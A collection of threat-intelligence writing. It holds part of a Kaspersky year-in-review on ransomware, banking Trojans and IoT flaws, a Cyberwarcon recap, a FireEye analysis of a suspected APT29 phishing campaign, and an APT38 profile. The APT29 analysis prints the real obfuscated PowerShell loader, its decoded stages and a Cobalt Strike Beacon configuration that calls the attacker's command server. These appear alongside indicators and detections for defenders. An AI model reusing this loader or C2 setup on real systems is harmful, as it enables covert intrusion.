However, it’s not only new ransomware families that are causing problems. One and a half years after the WannaCry epidemic, it continues to top the list of the most widespread cryptor families – so far, we have seen 74,621 unique attacks worldwide. These attacks accounted for 28.72% of all those targeted with cryptors in Q3 2018. This percentage has risen by two-thirds during the last year. This is especially alarming considering that a patch for the EternalBlue exploit used by WannaCry existed even before the initial epidemic in May 2017.

Asacub and banking Trojans

2018 showed the most impressive figures in terms of the number of attacks involving mobile banking Trojans. At the beginning of the year, this type of threat seemed to have leveled off both in number of unique samples detected and number of users attacked.

However, in the second quarter there was a dramatic change for the worse: record-breaking numbers of detected mobile banking Trojans and attacked users. The root cause of this significant upturn is unclear, though the main culprits were the creators of Asacub and Hqwar. An interesting feature of Asacub is its longevity: according to our data, the group behind it has been operating for more than three years.

Asacub evolved from an SMS Trojan, which from the very outset possessed techniques for preventing deletion and intercepting incoming calls and SMSs. The creators subsequently complicated the program logic and started the mass distribution of the malware. The chosen vector was the same as that at the very beginning – social engineering via SMS. However, this time the valid phone numbers were sourced from popular bulletin boards, with owners often expecting messages from unfamiliar subscribers.

The propagation technique then snowballed when the devices that the Trojan had infected started spreading the infection – Asacub self-proliferated to the victim’s entire contact list.

Smart doesn’t mean secure

These days we’re surrounded by smart devices. This includes everyday household objects such as TVs, smart meters, thermostats, baby monitors and children’s toys. But it also includes cars, medical devices, CCTV cameras and parking meters. We’re even seeing the emergence of smart cities. However, this offers a greater attack surface to anyone looking to take advantage of security weaknesses – for whatever purpose. Securing traditional computers is difficult. But things are more problematic with the internet of things (IoT), where lack of standardization leaves developers to ignore security, or consider it as an afterthought. There are plenty of examples to illustrate this.

In February, we explored the possibility that a smart hub might be vulnerable to attack. A smart hub lets you control the operation of other smart devices in the home, receiving information and issuing commands. Smart hubs might be controlled through a touch screen, or through a mobile app or web interface. If it’s vulnerable, it would potentially provide a single point of failure. While the smart hub our researchers investigated didn’t contain significant vulnerabilities, there were logical mistakes that were enough to allow our researchers to obtain remote access.

Researchers at Kaspersky Lab ICS CERT checked a popular smart camera to see how well protected it is from hackers. Smart cameras are now part of everyday life. Many now connect to the cloud, allowing someone to monitor what’s happening at a remote location – to check on pets, for security surveillance, etc. The model our researchers investigated is marketed as an all-purpose tool – suitable for use as a baby monitor, or as part of a security system. The camera is able to see in the dark, follow a moving object, stream footage to a smartphone or tablet and play back sound through a built-in speaker. Unfortunately, the camera turned out to have 13 vulnerabilities – almost as many as it has features – that could allow an attacker to change the administrator password, execute arbitrary code on the device, build a botnet of compromised cameras or stop it functioning completely.

Potential problems are not limited to consumer devices. Early this year, Ido Naor, a researcher from our Global Research and Analysis Team and Amihai Neiderman from Azimuth Security, discovered a vulnerability in an automation device for a gas station. This device was directly connected to the internet and was responsible for managing every component of the station, including fuel dispensers and payment terminals. Even more alarming, the web interface for the device was accessible with default credentials. Further investigation revealed that it was possible to shut down all fueling systems, cause a fuel leakage, change the price, circumvent the payment terminal (in order to steal money), capture vehicle license plates and driver identities, execute code on the controller unit and even move freely across the gas station network.

Technology is driving improvements in healthcare. It has the power to transform the quality and reduce the cost of health and care services. It can also give patients and citizens more control over their care, empower carers and support the development of new medicines and treatments. However, new healthcare technologies and mobile working practices are producing more data than ever before, at the same time providing more opportunities for data to be lost or stolen. We’ve highlighted the issues several times over the last few years (you can read about it here, here and here). We continue to track the activities of cybercriminals, looking at how they penetrate medical networks, how they find data on publicly available medical resources and how they exfiltrate it. In September, we examined healthcare security. More than 60% of medical organizations had some kind of malware on their computers. In addition, attacks continue to grow in the pharmaceutical industry. It’s vital that medical facilities remove all nodes that process personal medical data, update software and remove applications that are no longer needed, and do not connect expensive medical equipment to the main LAN. You can find our detailed advice here.

This year, we also investigated smart devices for animals – specifically, trackers to monitor the location of pets. These gadgets are able to access the pet owner’s home network and phone, and their pet’s location. We wanted to find out how secure they are. Our researchers looked at several popular trackers for potential vulnerabilities. Four of the trackers we looked at use Bluetooth LE technology to communicate with the owner’s smartphone. But only one does so correctly. The others can receive and execute commands from anyone. They can also be disabled, or hidden from the owner – all that’s needed is proximity to the tracker. Only one of the tested Android apps verifies the certificate of its server, without relying solely on the system. As a result, they are vulnerable to man-in-the-middle (MitM) attacks—intruders can intercept transmitted data by ‘persuading’ victims to install their certificate.

Some of our researchers also looked at human wearable devices – specifically, smart watches and fitness trackers. We were interested in a scenario where a spying app installed on a smartphone could send data from the built-in motion sensors (accelerometer and gyroscope) to a remote server and use the data to piece together the wearer’s actions – walking, sitting, typing, etc. We started with an Android-based smartphone, created a simple app to process and transmit the data and then looked at what we could get from this data. Not only was it possible to work out that the wearer is sitting or walking, but also figure out if they are out for a stroll or changing subway trains, because the accelerometer patterns differ slightly – this is how fitness trackers distinguish between walking and cycling. It is also easy to see when someone is typing. However, finding out what they are typing would be hard and would require repeated text entry. Our researchers were able to recover a computer password with 96 per cent accuracy and a PIN code entered at an ATM with 87 per cent accuracy. However, it would be much harder to obtain other information – for example, a credit card number or CVC code – because of the lack of predictability about when the victim would type such information. In reality, the difficulty involved in obtaining such information means that an attacker would have to have a strong motive for targeting someone specific. Of course, there are situations where this might be worthwhile for attackers.

There has been a growth in car sharing services in recent years. Such services clearly provide flexibility for people wanting to get around major cities. However, it raises the question of security – how safe is the personal information of people using the services? In July, we tested 13 apps, to see if their developers have considered security. The results of our tests were not encouraging. It’s clear that app developers don’t fully understand the current threats to mobile platforms – this is true for both the design stage and when creating the infrastructure. A good first step would be to expand the functionality for notifying customers of suspicious activities – only one service currently sends notifications to customers about attempts to log in to their account from a different device. The majority of the apps we analyzed are poorly designed from a security standpoint and need to be improved. Moreover, many of the programs are not just very similar to each other but are actually based on the same code. You can read our report here, including advice for customers of car sharing services and recommendations for developers of car sharing apps.

The use of smart devices is increasing. Some forecasts suggest that by 2020 the number of smart devices will exceed the world’s population several times over. Yet manufacturers still don’t prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions. And the updating process itself can be complex for the average consumer. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage internet traffic, others shoot video footage and still others control domestic devices – for example, air conditioning. Malware for smart devices is increasing not only in quantity, but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to launch DDoS attacks, to steal personal data and to mine crypto-currency. In September, we published a report on IoT threats, and this year we have started to include data on IoT attacks in our quarterly and end-of-year statistics reports.

It’s vital that vendors improve their security approach, ensuring that security is considered when products are being designed. Governments in some countries, in an effort to encourage security by design in manufacturers of smart devices, are introducing guidelines. In October, the UK government launched its code of practice for consumer IoT security. The German government recently published its suggestions for minimum standards for broadband routers.

It’s also important that consumers consider security before buying any connected device.

  • Consider if you really need the device. If you do, check the functions available and disable any that you don’t need to reduce your attack surface.
  • Look online for information about any vulnerabilities that have been reported.
  • Check to see if it’s possible to update the firmware on the device.
  • Always change the default password and replace it with a unique, complex password.
  • Don’t share serial numbers, IP addresses and other sensitive data relating to the device online.

Our data in their hands

Personal information is a valuable commodity. This is evident from the steady stream of data breaches reported in the news – these include Under Armour, FIFA, Adidas, Ticketmaster, T-Mobile, Reddit, British Airways and Cathay Pacific.

The scandal involving the use, by Cambridge Analytica, of Facebook data is a reminder that personal information is not just valuable to cybercriminals. In many cases, personal data is the price people pay to obtain a product or service – ‘free’ browsers, ‘free’ email accounts, ‘free’ social network accounts, etc. But not always. Increasingly, we’re surrounded by smart devices that are capable of gathering details on the minutiae of our lives. Earlier this year, one journalist turned her apartment into a smart home in order to measure how much data was being collected by the firms that made the devices. Since we generally pay for such devices, the harvesting of data can hardly be seen as the price we pay for the benefits they bring in these cases.

Some data breaches have resulted in fines for the companies affected (the UK Information Commissioner’s Office fined Equifax and Facebook, for example). However, so far fines levied have been for breaches that occurred before the EU General Data Protection Regulation (GDPR) came into force in May. The penalties for any serious breaches that occur in the future are likely to be much higher.

There’s no such thing as 100% security, of course. But any organization that holds personal data has a duty of care to secure it effectively. And where a breach results in the theft of personal information, companies should alert their customers in a timely manner, enabling them to take steps to limit the potential damage that can occur.

While there’s nothing that we, as individuals, can do to prevent the theft of our personal information from an online provider, it’s important that we take steps to secure our online accounts and to minimize the impact of any breach – in particular, by using unique passwords for each site, and by using two-factor authentication.

First Annual Cyberwarcon

Cyberwarcon is a brand new event organized yesterday in Arlington, Virginia, and delivered eight hours of fantastic content. “CyberwarCon is a one-day conference in the Washington D.C. area focused on the specter of destruction, disruption, and malicious influence on our society through cyber capabilities. We are increasingly concerned that aggressive behavior in this space is not abating and public discourse is necessary to shore up our defenses and prepare for inevitable incidents”. The list of speakers was diverse in their interests, from big data visualization technologies and analysis of social media misinformation campaigns, to incidents of Russian speaking APT in the US electrical grid. Thomas Rid keynoted with a presentation full of newly unearthed images and details on the earliest known misinformation campaign targeting the US, with some hints of what is to come for his upcoming book “Active Measures: A History of Disinformation”, certain to be another fascinating study and read. The full agenda can be found here.

Cyberwarcon badge

Our participation included my lightning talk presentation “Barely Whispering – Recent RU-speaking APT findings”. I attempted to clarify several transitively related clusters of RU-speaking APT activity and resources that we label Sofacy, BE/GreyEnergy, Zebrocy, and an advanced cluster, Hades, and introduced some data points new to public discussion about the groups. Three have exhibited disruptive and destructive behavior. It’s nice to see that some of the information I mentioned yesterday, Zebrocy’s nine month long and increasingly large wave of spearphishing, is in the news today. I briefly mentioned that their remote template spearphishing techniques, along with a switch back to the Delphi backdoor from a C# “Cannon” backdoor, was spreading to western networks. Timely stuff.

Check out the images and tweets at #CYBERWARCON. Hope to see you next year!

Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign

Introduction

  • FireEye devices detected intrusion attempts against multiple industries, including think tank, law enforcement, media, U.S. military, imagery, transportation, pharmaceutical, national government, and defense contracting.
  • The attempts involved a phishing email appearing to be from the U.S. Department of State with links to zip files containing malicious Windows shortcuts that delivered Cobalt Strike Beacon.
  • Shared technical artifacts; tactics, techniques, and procedures (TTPs); and targeting connect this activity to previously observed activity suspected to be APT29.
  • APT29 is known to transition away from phishing implants within hours of initial compromise.

On November 14, 2018, FireEye detected new targeted phishing activity at more than 20 of our clients across multiple industries.

The attacker appears to have compromised the email server of a hospital and the corporate website of a consulting company in order to use their infrastructure to send phishing emails. The phishing emails were made to look like secure communication from a Public Affairs official at the U.S. Department of State, hosted on a page made to look like another Department of State Public Affairs official's personal drive, and used a legitimate Department of State form as a decoy. This information could be obtained via publicly available data, and there is no indication that the Department of State network was involved in this campaign. The attacker used unique links in each phishing email and the links that FireEye observed were used to download a ZIP archive that contained a weaponized Windows shortcut file, launching both a benign decoy document and a Cobalt Strike Beacon backdoor, customized by the attacker to blend in with legitimate network traffic.

Several elements from this campaign – including the resources invested in the phishing email and network infrastructure, the metadata from the weaponized shortcut file payload, and the specific victim individuals and organizations targeted – are directly linked to the last observed APT29 phishing campaign from November 2016. This blog post explores those technical breadcrumbs and the possible intentions of this activity.

Attribution Challenges

Conclusive FireEye attribution is often obtained through our Mandiant consulting team's investigation of incidents at compromised organizations, to identify details of the attack and post-compromise activity at victims. FireEye is still analyzing this activity.

There are several similarities and technical overlaps between the 14 November 2018, phishing campaign and the suspected APT29 phishing campaign on 9 November 2016, both of which occurred shortly after U.S. elections. However, the new campaign included creative new elements as well as a seemingly deliberate reuse of old phishing tactics, techniques and procedures (TTPs), including using the same system to weaponize a Windows shortcut (LNK) file. APT29 is a sophisticated actor, and while sophisticated actors are not infallible, seemingly blatant mistakes are cause for pause when considering historical uses of deception by Russian intelligence services. It has also been over a year since we have conclusively identified APT29 activity, which raises questions about the timing and the similarities of the activity after such a long interlude.

Notable similarities between this and the 2016 campaign include the Windows shortcut metadata, targeted organizations and specific individuals, phishing email construction, and the use of compromised infrastructure. Notable differences include the use of Cobalt Strike, rather than custom malware; however, many espionage actors do use publicly and commercially available frameworks for reasons such as plausible deniability.

During the phishing campaign, there were indications that the site hosting the malware was selectively serving payloads. For example, requests using incorrect HTTP headers reportedly served ZIP archives containing only the benign publicly available Department of State form. It is possible that the threat actor served additional and different payloads depending on the link visited; however, FireEye has only observed two: the benign and Cobalt Strike variations.

We provide details of this in the activity summary. Analysis of the campaign is ongoing, and we welcome any additional information from the community.

Activity Summary

The threat actor crafted the phishing emails to masquerade as a U.S. Department of State Public Affairs official sharing an official document. The links led to a ZIP archive that contained a weaponized Windows shortcut file hosted on a likely compromised legitimate domain, jmj[.].com. The shortcut file was crafted to execute a PowerShell command that read, decoded, and executed additional code from within the shortcut file.

Upon execution, the shortcut file dropped a benign, publicly available, U.S. Department of State form and Cobalt Strike Beacon. Cobalt Strike is a commercially available post-exploitation framework. The BEACON payload was configured with a modified variation of the publicly available "Pandora" Malleable C2 Profile and used a command and control (C2) domain – pandorasong[.]com – assessed to be a masquerade of the Pandora music streaming service. The customization of the C2 profile may have been intended to defeat less resilient network detection methods dependent on the default configurations. The shortcut metadata indicates it was built on the same or very similar system as the shortcut used in the November 2016 campaign. The decoy content is shown in Figure 1.


Figure 1: Decoy document content

Similarities to Older Activity

This activity has TTP and targeting overlap with previous activity, suspected to be APT29. The malicious LNK used in the recent spearphishing campaign, ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c), has technical overlaps with a suspected APT29 LNK from November 2016, 37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5: f713d5df826c6051e65f995e57d6817d), which was publicly reported by Volexity. The 2018 and 2016 LNK files are similar in structure and code, and contain significant metadata overlap, including the MAC address of the system on which the LNK was created.

Additional overlap was observed in the targeting and tactics employed in the phishing campaigns responsible for distributing these LNK file. Previous APT29 activity targeted some of the same recipients of this email campaign, and APT29 has leveraged large waves of emails in previous campaigns.

Outlook and Implications

Analysis of this activity is ongoing, but if the APT29 attribution is strengthened, it would be the first activity uncovered from this sophisticated group in at least a year. Given the widespread nature of the targeting, organizations that have previously been targeted by APT29 should take note of this activity. For network defenders, whether or not this activity was conducted by APT29 should be secondary to properly investigating the full scope of the intrusion, which is of critical importance if the elusive and deceptive APT29 operators indeed had access to your environment.  

Technical Details

Phishing

Emails were sent from DOSOneDriveNotifications-svCT-Mailboxe36625aaa85747214aa50342836a2315aaa36928202aa46271691a8255aaa15382822aa25821925a0245@northshorehealthgm[.]org with the subject Stevenson, Susan N shared "TP18-DS7002 (UNCLASSIFIED)" with you. The distribution of emails varied significantly between the affected organizations. While most targeted FireEye customers received three or fewer emails, some received significantly more, with one customer receiving 136.

Each phishing email contained a unique malicious URL, likely for tracking victim clicks. The pattern of this URL is shown in Figure 2.


Figure 2: Malicious URL structure

Outside of the length of the sender email address, which may have been truncated on some recipient email clients, the attacker made little effort to hide the true source of the emails, including that they were not actually sent from the Department of State. Figure 3 provides a redacted snapshot of email headers from the phishing message.


Figure 3: Redacted email headers

The malicious links are known to have served two variants of the file ds7002.zip. The first variant (MD5: 3fccf531ff0ae6fedd7c586774b17a2d), contained ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c). ds7002.lnk was a malicious shortcut (LNK) file that contained an embedded BEACON DLL and decoy PDF, and was crafted to launch a PowerShell command. On execution, the PowerShell command extracted and executed the Cobalt Strike BEACON backdoor and decoy PDF. The other observed variant of ds7002.zip (MD5: 658c6fe38f95995fa8dc8f6cfe41df7b) contained only the benign decoy document. The decoy document ds7002.pdf (MD5: 313f4808aa2a2073005d219bc68971cd) appears to have been downloaded from hxxps://eforms.state.gov/Forms/ds7002.PDF.

The BEACON backdoor communicated with the C2 domain pandorasong[.]com (95.216.59[.]92). The domain leveraged privacy protection, but had a start of authority (SOA) record containing vleger@tutanota.com.

Our analysis indicates that the attacker started configuring infrastructure approximately 30 days prior to the attack. This is a significantly longer delay than many other attackers we track. Table 1 contains a timeline of this activity.

Time

Event

Source

2018-10-15 15:35:19Z

pandorasong[.]com registered

Registrant Information

2018-10-15 17:39:00Z

pandorasong[.]com SSL certificate established

Certificate Transparency

2018-10-15 18:52:06Z

Cobalt Strike server established

Scan Data

2018-11-02 10:25:58Z

LNK Weaponized

LNK Metadata

2018-11-13 17:58:41Z

3fccf531ff0ae6fedd7c586774b17a2d modified

Archive Metadata

2018-11-14 01:48:34Z

658c6fe38f95995fa8dc8f6cfe41df7b modified

Archive Metadata

2018-11-14 08:23:10Z

First observed phishing e-mail sent

Telemetry

Table 1: Operational timeline

Execution

Upon execution of the malicious LNK, ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c), the following PowerShell command was executed:

\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noni -ep bypass
$zk='JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5
rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0ZW0gLVBhdGggJE
Vudjp0ZW1wIC1GaWx0ZXIgJHRiIC1SZWN1cnNlO2lmICgtbm90ICRvZSkge2V4aXR9W
0lPLkRpcmVjdG9yeV06OlNldEN1cnJlbnREaXJlY3RvcnkoJG9lLkRpcmVjdG9yeU5hbWUp
O30kdnp2aT1OZXctT2JqZWN0IElPLkZpbGVTdHJlYW0gJHRiLCdPcGVuJywnUmVhZCcsJ
1JlYWRXcml0ZSc7JG9lPU5ldy1PYmplY3QgYnl0ZVtdKCR2Y3EtJHB0Z3QpOyRyPSR2en
ZpLlNlZWsoJHB0Z3QsW0lPLlNlZWtPcmlnaW5dOjpCZWdpbik7JHI9JHZ6dmkuUmVhZC
gkb2UsMCwkdmNxLSRwdGd0KTskb2U9W0NvbnZlcnRdOjpGcm9tQmFzZTY0Q2hhckFy
cmF5KCRvZSwwLCRvZS5MZW5ndGgpOyR6az1bVGV4dC5FbmNvZGluZ106OkFTQ0lJL
kdldFN0cmluZygkb2UpO2lleCAkems7';$fz='FromBase'+0x40+'String';$rhia=[Text.E
ncoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia;

This command included some specific obfuscation, which may indicate attempts to bypass specific detection logic. For example, the use of 'FromBase'+0x40+'String', in place of FromBase64String, the PowerShell command used to decode base64.

The decoded command consisted of additional PowerShell that read the content of ds7002.lnk from offset 0x5e2be to offset 0x623b6, base64 decoded the extracted content, and executed it as additional PowerShell content. The embedded PowerShell code decoded to the following:

$ptgt=0x0005e2be;
$vcq=0x000623b6;
$tb="ds7002.lnk";
if (-not(Test-Path $tb))
{
$oe=Get-ChildItem -Path $Env:temp -Filter $tb -Recurse;
if (-not $oe)
{
   exit
}
[IO.Directory]::SetCurrentDirectory($oe.DirectoryName);
}
$vzvi=New-Object IO.FileStream $tb,'Open','Read','ReadWrite';
$oe=New-Object byte[]($vcq-$ptgt);
$r=$vzvi.Seek($ptgt,[IO.SeekOrigin]::Begin);
$r=$vzvi.Read($oe,0,$vcq-$ptgt);
$oe=[Convert]::FromBase64CharArray($oe,0,$oe.Length);
$zk=[Text.Encoding]::ASCII.GetString($oe);
iex $zk;

When the decoded PowerShell is compared to the older 2016 PowerShell embedded loader (Figure 4), it's clear that similarities still exist. However, the new activity leverages randomized variable and function names, as well as obfuscating strings contained in the script.


Figure 4: Shared functions to loader in older activity (XOR decode function and CopyFilePart)

The PowerShell loader code is obfuscated, but a short de-obfuscated snippet is shown as follows. The decoy PDF and BEACON loader DLL are read from specific offsets within the LNK, decoded, and their contents executed. The BEACON loader DLL is executed with the export function "PointFunctionCall":

[TRUNCATED]
$jzffhy = [IO.FileAccess]::READ
$gibisec = myayxvj $("ds7002.lnk")
$oufgke = 0x48bd8
$wabxu = 0x5e2be - $oufgke
$lblij = bygtqi $gibisec $oufgke $wabxu $("%TEMP%\ds7002.PDF") Invoke-Item
$((lylyvve @((7,(30 + 0x34 - 3),65,(84 - 5),(-38 + 112),(-16 + 0x25 + 52))) 35))
$oufgke = 0x0dd8
$wabxu = 0x48bd8 - $oufgke
$yhcgpw = bygtqi $gibisec $oufgke $wabxu $("%LOCALAPPDATA%\cyzfc.dat") if
($ENV:PROCESSOR_ARCHITECTURE -eq $("AMD64")) { & ($("rundll32.exe")) $(",")
$("PointFunctionCall") }

Files Dropped

Upon successful execution of the LNK file, it dropped the following files to the victim's system:

  • %APPDATA%\Local\cyzfc.dat (MD5: 16bbc967a8b6a365871a05c74a4f345b)
    • BEACON loader DLL
  • %TEMP%\ds7002.PDF (MD5: 313f4808aa2a2073005d219bc68971cd)
    • Decoy document

The dropped BEACON loader DLL was executed by RunDll32.exe using the export function "PointFunctionCall":

"C:\Windows\system32\rundll32.exe"
C:\Users\Administrator\AppData\Local\cyzfc.dat, PointFunctionCall

The BEACON payload included the following configuration:

authorization_id: 0x311168c
dns_sleep: 0
http_headers_c2_post_req:
  Accept: */*
  Content-Type: text/xml
  X-Requested-With: XMLHttpRequest
  Host: pandorasong.com
http_headers_c2_request:
  Accept: */*
  GetContentFeatures.DLNA.ORG: 1
  Host: pandorasong[.]com
  Cookie:  __utma=310066733.2884534440.1433201462.1403204372.1385202498.7;
jitter: 17
named_pipes: \\\\%s\\pipe\\msagent_%x
process_inject_targets:
  %windir%\\syswow64\\rundll32.exe
  %windir%\\sysnative\\rundll32.exe
beacon_interval: 300
c2:
  conntype: SSL
  host: pandorasong[.]com
  port: 443
c2_urls:
  pandorasong[.]com/radio/xmlrpc/v45
  pandorasong[.]com/access/
c2_user_agents: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko

Network Communications

After successful installation/initialization of the malware, it made the following callback to the C2 server pandorasong[.]com via TCP/443 SSL. The sample was configured to use a malleable C2 profile for its network communications. The specific profile used appears to be a modified version of the publicly available Pandora C2 profile. The profile may have been changed to bypass common detections for the publicly available malleable profiles. The following is a sample GET request:

GET /access/?version=4&lid=1582502724&token=ajlomeomnmeapoagcknffjaehikhmpep
Bdhmoefmcnoiohgkkaabfoncfninglnlbmnaahmhjjfnopdapdaholmanofaoodkiokobenhjd
Mjcmoagoimbahnlbdelchkffojeobfmnemdcoibocjgnjdkkbfeinlbnflaeiplendldlbhnhjmbg
agigjniphmemcbhmaibmfibjekfcimjlhnlamhicakfmcpljaeljhcpbmgblgnappmkpbcko
HTTP/1.1
Accept: */*
GetContentFeatures.DLNA.ORG: 1
Host: pandorasong.com
Cookie: __utma=310066733.2884534440.1433201462.1403204372.1385202498.7;
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like
Gecko
Connection: Keep-Alive
Cache-Control: no-cache

Similarities to Older Activity

Figure 5 and Figure 6 show the overlapping characteristics between the LNK used in the recent spear phish emails, ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c), compared to a suspected APT29 LNK from the November 2016 attack that led to the SPIKERUSH backdoor, 37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5: f713d5df826c6051e65f995e57d6817d).


Figure 5: LNK characteristics: new activity (left) and old activity (right)


Figure 6: LNK characteristics: new activity (left) and old activity (right)

In addition to similar LNK characteristics, the PowerShell command is very similar to the code from the older sample that executed the SPIKERUSH backdoor. Some of the same variable names are retained in this new version, as seen in Figure 7 and Figure 8.


Figure 7: Embedded PowerShell: new activity (left) and old activity (right)


Figure 8: Shared string obfuscation logic: new LNK activity (left) and old VERNALDROP activity (right)

Indicators

Indicator

Description

dosonedrivenotifications-svct-mailboxe36625aaa85747214aa50342836a2315aaa36
928202aa46271691a8255aaa15382822aa25821925a
0245@northshorehealthgm[.]org

Phishing email address from likely compromised legitimate server

Stevenson, Susan N shared "TP18-DS7002 (UNCLASSIFIED)" with you

Phishing email subject

https://www.jmj[.]com/personal/nauerthn_state_gov/*

Malware hosting location on likely compromised legitimate domain

pandorasong[.]com

BEACON C2

95.216.59[.]92

Resolution of pandorasong[.]com

2b13b244aafe1ecace61ea1119a1b2ee

SSL certificate for pandorasong[.]com

3fccf531ff0ae6fedd7c586774b17a2d

Malicious ZIP archive MD5

658c6fe38f95995fa8dc8f6cfe41df7b

Benign ZIP archive MD5

6ed0020b0851fb71d5b0076f4ee95f3c

Malicious LNK file MD5

313f4808aa2a2073005d219bc68971cd

Benign decoy PDF MD5

16bbc967a8b6a365871a05c74a4f345b

BEACON DLL MD5

%APPDATA%\Local\cyzfc.dat

BEACON DLL file path

%TEMP%\ds7002.PDF

Benign decoy PDF file path

Table 2: Indicators

Related Samples

37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5: f713d5df826c6051e65f995e57d6817d)

FireEye Detection

FireEye detected this activity across our platform. Table 3 contains the specific detection names that applied to this activity.

Product

Detection names

Network Security

Malware.Archive
Malware.Binary.lnk
Suspicious.Backdoor.Beacon

Endpoint Security

SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
Generic.mg.16bbc967a8b6a365

Threat Analytics Platform

WINDOWS METHODOLOGY [PowerShell Base64 String]
WINDOWS METHODOLOGY [Rundll32 Roaming]
WINDOWS METHODOLOGY [PowerShell Script Block Warning]
WINDOWS METHODOLOGY [Base64 Char Args]
TADPOLE DOWNLOADER [Rundll Args]
INTEL HIT - IP [Structured Threat Reputation-Based]
INTEL HIT - FQDN [Structured Threat Reputation-Based] [DNS]
INTEL HIT - FQDN [Structured Threat Reputation-Based] [Non-DNS]
INTEL HIT - FILE HASH [Structured Threat Reputation-Based]

Table 3: FireEye product detections

APT38: Details on New North Korean Regime-Backed Threat Group

Today, we are releasing details on the threat group that we believe is responsible for conducting financial crime on behalf of the North Korean regime, stealing millions of dollars from banks worldwide. The group is particularly aggressive; they regularly use destructive malware to render victim networks inoperable following theft. More importantly, diplomatic efforts, including the recent Department of Justice (DOJ) complaint that outlined attribution to North Korea, have thus far failed to put an end to their activity. We are calling this group APT38.

We are releasing a special report, APT38: Un-usual Suspects, to expose the methods used by this active and serious threat, and to complement earlier efforts by others to expose these operations, using FireEye’s unique insight into the attacker lifecycle.

We believe APT38’s financial motivation, unique toolset, and tactics, techniques and procedures (TTPs) observed during their carefully executed operations are distinct enough to be tracked separately from other North Korean cyber activity. There are many overlapping characteristics with other operations, known as “Lazarus” and the actor we call TEMP.Hermit; however, we believe separating this group will provide defenders with a more focused understanding of the adversary and allow them to prioritize resources and enable defense. The following are some of the ways APT38 is different from other North Korean actors, and some of the ways they are similar:

  • We find there are clear distinctions between APT38 activity and the activity of other North Korean actors, including the actor we call TEMP.Hermit. Our investigation indicates they are disparate operations against different targets and reliance on distinct TTPs; however, the malware tools being used either overlap or exhibit shared characteristics, indicating a shared developer or access to the same code repositories. As evident in the DOJ complaint, there are other shared resources, such as personnel who may be assisting multiple efforts.
  • A 2016 Novetta report detailed the work of security vendors attempting to unveil tools and infrastructure related to the 2014 destructive attack against Sony Pictures Entertainment. This report detailed malware and TTPs related to a set of developers and operators they dubbed “Lazarus,” a name that has become synonymous with aggressive North Korean cyber operations.
    • Since then, public reporting attributed additional activity to the “Lazarus” group with varying levels of confidence primarily based on malware similarities being leveraged in identified operations. Over time, these malware similarities diverged, as did targeting, intended outcomes and TTPs, almost certainly indicating that this activity is made up of multiple operational groups primarily linked together with shared malware development resources and North Korean state sponsorship.

Since at least 2014, APT38 has conducted operations in more than 16 organizations in at least 13 countries, sometimes simultaneously, indicating that the group is a large, prolific operation with extensive resources. The following are some details about APT38 targeting:

  • The total number of organizations targeted by APT38 may be even higher when considering the probable low incident reporting rate from affected organizations.
  • APT38 is characterized by long planning, extended periods of access to compromised victim environments preceding any attempts to steal money, fluency across mixed operating system environments, the use of custom developed tools, and a constant effort to thwart investigations capped with a willingness to completely destroy compromised machines afterwards.
  • The group is careful, calculated, and has demonstrated a desire to maintain access to a victim environment for as long as necessary to understand the network layout, required permissions, and system technologies to achieve its goals.
  • On average, we have observed APT38 remain within a victim network for approximately 155 days, with the longest time within a compromised environment believed to be almost two years.
  • In just the publicly reported heists alone, APT38 has attempted to steal over $1.1 billion dollars from financial institutions.

Investigating intrusions of many victimized organizations has provided us with a unique perspective into APT38’s entire attack lifecycle. Figure 1 contains a breakdown of observed malware families used by APT38 during the different stages of their operations. At a high-level, their targeting of financial organizations and subsequent heists have followed the same general pattern:

  1. Information Gathering: Conducted research into an organization’s personnel and targeted third party vendors with likely access to SWIFT transaction systems to understand the mechanics of SWIFT transactions on victim networks (Please note: The systems in question are those used by the victim to conduct SWIFT transactions. At no point did we observe these actors breach the integrity of the SWIFT system itself.).
  2. Initial Compromise: Relied on watering holes and exploited an insecure out-of-date version of Apache Struts2 to execute code on a system.
  3. Internal Reconnaissance: Deployed malware to gather credentials, mapped the victim’s network topology, and used tools already present in the victim environment to scan systems.
  4. Pivot to Victim Servers Used for SWIFT Transactions: Installed reconnaissance malware and internal network monitoring tools on systems used for SWIFT to further understand how they are configured and being used. Deployed both active and passive backdoors on these systems to access segmented internal systems at a victim organization and avoid detection.
  5. Transfer funds: Deployed and executed malware to insert fraudulent SWIFT transactions and alter transaction history. Transferred funds via multiple transactions to accounts set up in other banks, usually located in separate countries to enable money laundering.
  6. Destroy Evidence: Securely deleted logs, as well as deployed and executed disk-wiping malware, to cover tracks and disrupt forensic analysis.


Figure 1: APT38 Attack Lifecycle

APT38 is unique in that it is not afraid to aggressively destroy evidence or victim networks as part of its operations. This attitude toward destruction is probably a result of the group trying to not only cover its tracks, but also to provide cover for money laundering operations.

In addition to cyber operations, public reporting has detailed recruitment and cooperation of individuals in-country to support with the tail end of APT38’s thefts, including persons responsible for laundering funds and interacting with recipient banks of stolen funds. This adds to the complexity and necessary coordination amongst multiple components supporting APT38 operations.

Despite recent efforts to curtail their activity, APT38 remains active and dangerous to financial institutions worldwide. By conservative estimates, this actor has stolen over a hundred million dollars, which would be a major return on the likely investment necessary to orchestrate these operations. Furthermore, given the sheer scale of the thefts they attempt, and their penchant for destroying targeted networks, APT38 should be considered a serious risk to the sector.

APT10 Targeting Japanese Corporations Using Updated TTPs

Introduction

